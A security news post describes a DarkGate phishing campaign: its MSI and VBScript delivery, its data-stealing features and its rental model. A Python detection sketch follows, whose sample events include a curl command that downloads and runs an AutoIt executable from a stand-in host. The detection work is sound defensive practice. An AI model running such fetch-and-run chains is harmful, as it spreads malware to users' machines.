Carding
The new spyware software is available to hackers of all stripes for a subscription starting from $1000 per day.
Security researchers have discovered a new malicious phishing campaign (MalSpam), in which victims' devices are infected with malware called DarkGate.
According to Telekom Security experts, the sudden surge in DarkGate activity may be due to the fact that the developer of this malware has started renting it out to a limited circle of affiliates.
The company's detailed report notes that the attack begins with a phishing link that leads the victim to a malicious MSI file through a traffic redirection system. Downloading and running this file initiates a multi-step process, which results in decryption and then launching DarkGate.
Researchers also noticed an alternative version of attacks using a Visual Basic script instead of an MSI file. It uses cURL to extract the AutoIt executable and the script itself. The exact method by which the VB script is delivered to the system is currently unknown.
DarkGate, sold on underground forums by a hacker under the pseudonym "RastaFarEye", is able to hide from antivirus programs, gain a foothold in the system using registry changes, increase privileges, steal data from browsers and programs like Discord and FileZilla.
The malware also communicates with the command server to steal files, run cryptominers, remotely create screenshots, and execute other commands. Early versions of the malware also had a ransomware module.
DarkGate is offered by subscription from $1,000 per day to $100,000 per year. The developer advertises it as "the best tool for pentesters", but everyone is well aware that there is no legitimate pentest here.
Phishing is still the main way to distribute bootloaders and other malware such as KrakenKeylogger, QakBot, Raccoon Stealer, and others. And according to a recent report from HP, email accounts for 79% of cyber threats identified in Q2 this year.
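As an added example that is not part of the post above or of the Telekom Security report, the following Python sketch shows detection logic a defender could run over endpoint process-creation events for the two delivery chains the post describes: a script host calling cURL to fetch an AutoIt executable, and an MSI installed from a user-writable path. The event field names and the sample events are constructed assumptions, not data from the report.

```python
"""Flag process-creation events that match the DarkGate delivery chains
described in the post. Event shape (Pid, Time, ParentImage, Image,
CommandLine) is an assumed Sysmon/EDR-like layout; all samples are constructed."""
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # VBScript / JScript hosts
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed sample events: a VBS dropper fetching AutoIt via curl, then running it.
SAMPLE_EVENTS = [
    {"Pid": 1, "Time": 100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\Downloads\invoice.vbs"},
    {"Pid": 2, "Time": 103, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\AutoIt3.exe http://example.invalid/a"},
    {"Pid": 3, "Time": 110, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AutoIt3.exe",
     "CommandLine": r"AutoIt3.exe C:\Users\alice\AppData\Local\Temp\script.au3"},
    {"Pid": 4, "Time": 500, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)

def classify(event):
    """Return a verdict string for a single event, or None if it looks benign."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"].lower()
    if parent in SCRIPT_HOSTS and image == "curl.exe":
        return "script-host-spawned-curl"
    if image == "autoit3.exe" and in_user_writable(event["Image"]):
        return "autoit-from-user-writable-path"
    if image == "msiexec.exe" and ("/i" in cmd or "-i" in cmd) and in_user_writable(cmd):
        return "msi-install-from-user-writable-path"
    return None

def detect(events, window=300):
    """Per-event verdicts plus a chain verdict when a script host's curl fetch is
    followed within `window` seconds by AutoIt running from a user-writable path."""
    hits, last_curl = [], None
    for e in sorted(events, key=lambda x: x["Time"]):
        verdict = classify(e)
        if verdict is None:
            continue
        hits.append((e["Pid"], verdict))
        if verdict == "script-host-spawned-curl":
            last_curl = e["Time"]
        elif verdict == "autoit-from-user-writable-path" and last_curl is not None \
                and e["Time"] - last_curl <= window:
            hits.append((e["Pid"], "darkgate-like-delivery-chain"))
    return hits
```

On the constructed sample set, `detect(SAMPLE_EVENTS)` flags the curl child, the AutoIt launch, and the combined chain, while the unrelated notepad event stays silent.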